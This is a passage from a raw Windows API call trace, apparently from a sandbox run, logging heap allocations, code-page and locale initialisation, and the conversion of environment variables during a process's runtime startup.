Size=0x72) returned 0x6f4d88 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x30) returned 0x6fd618 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x2e) returned 0x6fd650 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1c) returned 0x7014c8 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xd2) returned 0x703d78 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x7c) returned 0x703e58 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x36) returned 0x703ee0 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3a) returned 0x6f6b00 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x90) returned 0x703f20 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x24) returned 0x6fcf80 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x30) returned 0x6fd688 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x36) returned 0x7023d8 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x48) returned 0x6f9318 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x52) returned 0x702418 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3c) returned 0x6f6b48 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x82) returned 0x702478 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x2e) returned 0x6fd6c0 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x28) returned 0x6fcfb0 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1e) returned 0x7014f0 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x2c) returned 0x6fd6f8 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x54) returned 0x702508 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x52) returned 0x702568 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x2a) returned 0x6fd730 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3c) returned 0x6f6b90 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x54) returned 0x7025c8 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x24) returned 0x6fcfe0 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x30) returned 0x6fd768 [0130.970] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x8c) returned 0x702628 [0130.970] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x702ee8 | out: hHeap=0x6e0000) returned 1 [0131.050] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x800) returned 0x7026c0 [0131.056] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x80) returned 0x702ec8 [0131.094] GetLastError () returned 0x0 [0131.094] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x220) returned 0x702f50 [0131.094] GetLastError () returned 0x0 [0131.094] IsValidCodePage (CodePage=0x4e4) returned 1 [0131.095] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ecfc | out: lpCPInfo=0x18ecfc) returned 1 [0131.101] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18e7c4 | out: lpCPInfo=0x18e7c4) returned 1 [0131.106] GetLastError () returned 0x0 [0131.112] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18ebd8, cbMultiByte=256, lpWideCharStr=0x18e548, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0131.112] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18e7d8 | out: lpCharType=0x18e7d8) returned 1 [0131.112] GetLastError () returned 0x0 [0131.118] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0131.118] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e308, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0131.118] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18ead8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿtLxð\x14í\x18", lpUsedDefaultChar=0x0) returned 256 [0131.118] GetLastError () returned 0x0 [0131.118] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0131.118] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e318, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0131.118] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18e9d8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿtLxð\x14í\x18", lpUsedDefaultChar=0x0) returned 256 [0131.124] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0131.124] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x405c62 [0131.177] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x702ec8) returned 0x80 [0131.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0131.189] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x1f) returned 0x701518 [0131.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x701518, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0131.200] GetLastError () returned 0x0 [0131.200] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x4) returned 0x703fb8 [0131.200] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703fb8) returned 0x4 [0131.200] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703fb8, Size=0x8) returned 0x703fb8 [0131.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0131.200] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x36) returned 0x703178 [0131.200] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x703178, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0131.200] GetLastError () returned 0x0 [0131.205] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703fb8) returned 0x8 [0131.205] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703fb8, Size=0xc) returned 0x703fb8 [0131.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0131.206] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x37) returned 0x7031b8 [0131.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x7031b8, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0131.206] GetLastError () returned 0x0 [0131.206] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703fb8) returned 0xc [0131.206] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703fb8, Size=0x10) returned 0x703fb8 [0131.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0131.206] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x3c) returned 0x6f6bd8 [0131.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x6f6bd8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0131.206] GetLastError () returned 0x0 [0131.206] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703fb8) returned 0x10 [0131.206] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703fb8, Size=0x14) returned 0x703fb8 [0131.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0131.206] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x31) returned 0x7031f8 [0131.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x7031f8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0131.206] GetLastError () returned 0x0 [0131.206] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703fb8) returned 0x14 [0131.206] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703fb8, Size=0x18) returned 0x703fb8 [0131.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.206] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x17) returned 0x6f7b18 [0131.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x6f7b18, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0131.206] GetLastError () returned 0x0 [0131.206] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703fb8) returned 0x18 [0131.206] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703fb8, Size=0x1c) returned 0x703fb8 [0131.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0131.206] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x24) returned 0x6fd010 [0131.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x6fd010, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0131.206] GetLastError () returned 0x0 [0131.206] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703fb8) returned 0x1c [0131.206] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703fb8, Size=0x20) returned 0x703fb8 [0131.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0131.206] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x14) returned 0x6f7b38 [0131.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x6f7b38, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0131.207] GetLastError () returned 0x0 [0131.207] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703fb8) returned 0x20 [0131.207] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703fb8, Size=0x24) returned 0x703fb8 [0131.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0131.207] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0xd) returned 0x700c68 [0131.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x700c68, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0131.207] GetLastError () returned 0x0 [0131.207] RtlSizeHeap (HeapHandle=0x6e0000, Flags=0x0, MemoryPointer=0x703fb8) returned 0x24 [0131.207] RtlReAllocateHeap (Heap=0x6e0000, Flags=0x0, Ptr=0x703fb8, Size=0x28) returned 0x703fb8 [0131.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0131.207] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x8, Size=0x25) returned 0x6fd040 [0131.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x6fd040, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", 